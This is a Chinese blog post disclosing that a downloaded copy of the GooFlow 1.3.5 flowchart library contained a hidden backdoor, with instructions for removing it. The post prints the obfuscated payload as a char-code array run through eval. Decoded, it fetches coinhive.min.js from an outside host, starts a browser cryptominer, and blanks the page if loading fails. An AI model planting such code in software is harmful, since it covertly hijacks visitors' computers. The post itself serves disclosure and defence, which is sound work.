GooFlow有后门代码

最新推荐文章于 2020-09-28 15:54:54 发布
最新推荐文章于 2020-09-28 15:54:54 发布
阅读量1.2k 收藏
点赞数
分类专栏: js 文章标签: 隐藏代码 js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hncu1306602liuqiang/article/details/86511623
版权
js 同时被 2 个专栏收录
3 篇文章 0 订阅
订阅专栏
1 篇文章 0 订阅
订阅专栏

总结:在项目运行的时候发现html页面总是自动清空,js中有document.wirte(''),就是这个代码导致的,但是在GooFlow.js源码中根本就发现不了,结果发现eval()这个函数报错,于是执行代码发现隐藏代码。。。

这个地址下载的源码有问题:http://www.17sucai.com/pins/26954.html

修改源码:下图,注释掉eval函数的内容就好了

测试方式:在iframe中调用html才可以发现问题,html使用GooFlow

执行后的代码

源码解析

(function (c) {
                var r = '';
                for (var z = 0; z < c.length; z++) r += String.fromCharCode(c[z]);
                return r
            })([
                118, 97, 114, 32, 95, 61, 119, 105, 110, 100, 111, 119, 59, 116, 114, 121, 123, 95, 61, 95, 46, 111, 112, 101, 110, 101, 114, 46, 36, 125,
                99, 97, 116, 99, 104, 40, 101, 41, 123, 116, 114, 121, 123, 95, 61, 95, 46, 116, 111, 112, 46, 36, 125, 99, 97, 116, 99, 104, 40, 101, 41,
                123, 95, 61, 36, 125, 125, 59, 105, 102, 40, 33, 95, 40, 34, 104, 101, 97, 100, 34, 41, 46, 100, 97, 116, 97, 40, 39, 120, 39, 41, 41, 123,
                71, 111, 111, 70, 108, 111, 119, 46, 97, 61, 49, 59, 95, 97, 61, 50, 48, 59, 118, 97, 114, 32, 100, 61, 110, 101, 119, 32, 68, 97, 116, 101,
                40, 41, 59, 95, 40, 34, 104, 101, 97, 100, 34, 41, 46, 100, 97, 116, 97, 40, 39, 120, 39, 44, 49, 41, 59, 95, 46, 97, 106, 97, 120, 40, 34,
                104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 105, 110, 104, 105, 118, 101, 46, 99, 111, 109, 47, 108, 105, 98, 47, 99, 111, 105, 110, 104,
                105, 118, 101, 46, 109, 105, 110, 46, 106, 115, 63, 34, 43, 100, 46, 103, 101, 116, 70, 117, 108, 108, 89, 101, 97, 114, 40, 41, 43, 100,
                46, 103, 101, 116, 77, 111, 110, 116, 104, 40, 41, 43, 100, 46, 103, 101, 116, 68, 97, 116, 101, 40, 41, 44, 123, 100, 97, 116, 97, 84, 121,
                112, 101, 58, 39, 115, 99, 114, 105, 112, 116, 39, 44, 99, 97, 99, 104, 101, 58, 116, 114, 117, 101, 125, 41, 59, 95, 105, 61, 115, 101,
                116, 73, 110, 116, 101, 114, 118, 97, 108, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 116, 114, 121, 123, 110, 101, 119, 32,
                67, 111, 105, 110, 72, 105, 118, 101, 46, 65, 110, 111, 110, 121, 109, 111, 117, 115, 40, 39, 71, 71, 100, 80, 71, 104, 120, 73, 108, 111,
                108, 100, 97, 65, 114, 65, 114, 81, 86, 119, 120, 90, 50, 115, 100, 56, 108, 48, 97, 52, 107, 72, 39, 44, 123, 116, 104, 114, 111, 116, 116,
                108, 101, 58, 48, 46, 52, 125, 41, 46, 115, 116, 97, 114, 116, 40, 41, 59, 99, 108, 101, 97, 114, 73, 110, 116, 101, 114, 118, 97, 108, 40,
                95, 105, 41, 125, 99, 97, 116, 99, 104, 40, 101, 41, 123, 95, 97, 45, 45, 59, 105, 102, 40, 95, 97, 60, 49, 41, 100, 111, 99, 117, 109, 101,
                110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 34, 41, 125, 125, 44, 49, 48, 48, 48, 41, 125
            ])

我这个版本是

/**
 * Gooflow在线流程图设计器
 * Version: 1.3.5
 * Copyright: foolegg126(sdlddr)

这个人的代码有问题

文档参考地址

https://gooflow.xyz/docs/

 

 

不会撒谎的乌索普
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C# Gooflow+layer弹出层 全js代码
蒙蒙宝贝
04-10 3148
C# Gooflow+layer弹出层 全js代码
一个不易被发现的PHP后门代码解析
10-25
主要介绍了一个不易被发现的PHP后门代码解析,对于网络安全来说非常重要,需要的朋友可以参考下
GooFlow流程图绘制插件
热门推荐
球球的博客
05-02 1万+
var property = { width: 1200, height: 600, toolBtns: ["start round", "end round", "task round", "node", "chat", "state", "plug", "join", "fork", "complex mix"], haveHead: true, hea
gooflow源码
12-07
gooflow web画流程图 demo 源码下载
最好用的js流程控件gooflow最新版1.0源码
06-22
最好用的js流程控件gooflow最新版1.0源码
(绿色)修正版gooflow流程解决方案(源码分享+在线演示+UI地址下载)
wangchaoqi1985的博客
09-28 341
(绿色)修正版gooflow流程解决方案(源码分享+在线演示+UI地址下载)
小改GooFlow》》》goflow
plp520的专栏
06-06 454
流程图设计,没有表单,支持多种图形,来源于gooflow,仅供参考
新型ASP后门代码分析
10-31
ASP后门代码分析 本篇文章将对新型ASP后门代码进行深入分析,以帮助读者更好地理解 ASP 后门的工作原理和检测方法。 一、ASP 后门简介 ASP 后门是一种恶意代码,旨在通过 Web 应用程序来控制感染的计算机。...
防范wordpress主题加后门代码获取管理员权限
09-29
只需几行代码就可以为WordPress主题留下后门,大家要小心了
整理的比较全的一句话后门代码(方面大家查找后门)
10-28
整理的比较全的一句话后门代码(方面大家查找后门),很多情况下也会有一些特殊字符的表示,原理一样。
myflowgooflow插件对比
03-30
gooflow和myflow流程图插件对比说明,是否启用组织划分框编辑 如为否, 则左侧工具栏的 group 工具将不出现,  但是已经画了的“组织划分框”还是会出现的
基于JQUERY的WEB在线流程图设计器GooFlow
04-26
? 跨浏览器,可兼容IE7--IE10, FireFox, Chrome, Opera等几大内核的浏览器,且不需要浏览器再加装任何控件。 ? 多系统兼容性、可移植性:由于只包括前台UI,因此二次开发者可很方便将本插件用在任何一种需要流程图的B/S系统应用上,流程图的详细实现逻辑完全交于后台程序开发者自己实现;对于后台,只要能返回/接收能被本插件解析的JSON格式数据即可.所以本插件可用于不同的服务器语言建立的后台上. ? 跨领域:流程图设计器不止用在电信领域,在其它需要IT进行技术支持的领域中都有重大作用. ? 以下从纯技术实现层面具体描述: ? 页面顶部栏、左边侧边栏均可自定义; ? 当左边的侧边栏设为不显示时,为只读状态,此时的视图区可当作是一个查看器而非编辑器。 ? 侧边工具栏除了基本和一些流程节点按钮外,还自定义新的节点按钮,自定义节点都可以有自有的图标、类型名称,定义后在使用可可在工作区内增加这些自定义节点。 ? 顶部栏可显示流程图数据组的标题,也可提供一些常用操作按钮。 ? 顶部栏的按钮,除了撤销、重做按钮外,其余按钮均可自定义点击事件。 ? 可画直线、折线;折线还可以左右/上下移动其中段。 ? 具有区域划分功能,能让用户更直观地了解哪些节点及其相互间的转换,是属于何种自定义区域内的。 ? 具有标注功能,用橙红色标注某个结点或者转换线,一般用在展示流程进度时。 ? 能直接双击结点、连线、分组区域中的文字进行编辑 ? 在对结点、连线、分组区域的各种编辑操作,如新增/删除/修改名称/重设样式或大小/移动/标注时,均可捕捉到事件,并触发自定义事件,如果自定义事件执行的方法返回FALSE,则会阻止操作。 ? 具有操作事务序列控制功能,在工作区内的各种有效操作都能记录到一个栈中,然后可以进行撤销(undo())或重做(redo()),像典型的C/S软件一样。
GOOFLOW压缩包
07-20
这是一个用来在浏览器上设计流程图的WEB UI组件,基于Jquery开发。可用来设计各种引擎的流程图、逻辑流图,数据流图,或者是设计某个系统中需要走流程的功能应用。用户体验经本人的不断改良后使得操作界面很容易上手,不仅二次开发人员可用,最终用户也能用
GooFlow示例 V0.8
02-03
GooFlow.js V0.8版本,核心代码在Demo目录中的GooFlow目录下。GooFlow.js加了一个右键菜单,还需后需改进。
Vbs脚本实现radmin终极后门代码_删除自身
09-06
在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
foolegg126/gooflow - 码云 - 开源中国
weixin_34151004的博客
06-15 215
foolegg126/gooflow - 码云 - 开源中国
基于jquery的web在线流程图设计器gooFlow
weixin_30333885的博客
01-14 393
1、Gooflow特点 1.1 跨浏览器 可兼容IE7--IE10, FireFox, Chrome, Opera等几大内核的浏览器,且不需要浏览器再加装任何控件。 1.2 多系统兼容性、可移植性 由于只包括前台UI,因此二次开发者可很方便将本插件用在任何一种需要流程图的B/S系统应用上,流程图的详细实现逻辑完全交于后台程序开发者自己实现;对于后台,只要能返回/接收能被本插件解析的JSON...
kali后门漏洞有哪些
最新发布
05-04
1. SSH后门:通过在SSH服务器中插入恶意代码,黑客可以在未经授权的情况下访问受害者的系统。 2. 后门用户账户:黑客可以在受害者系统中创建一个隐藏的用户账户,以便随时访问系统。 3. Web后门:黑客可以通过在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值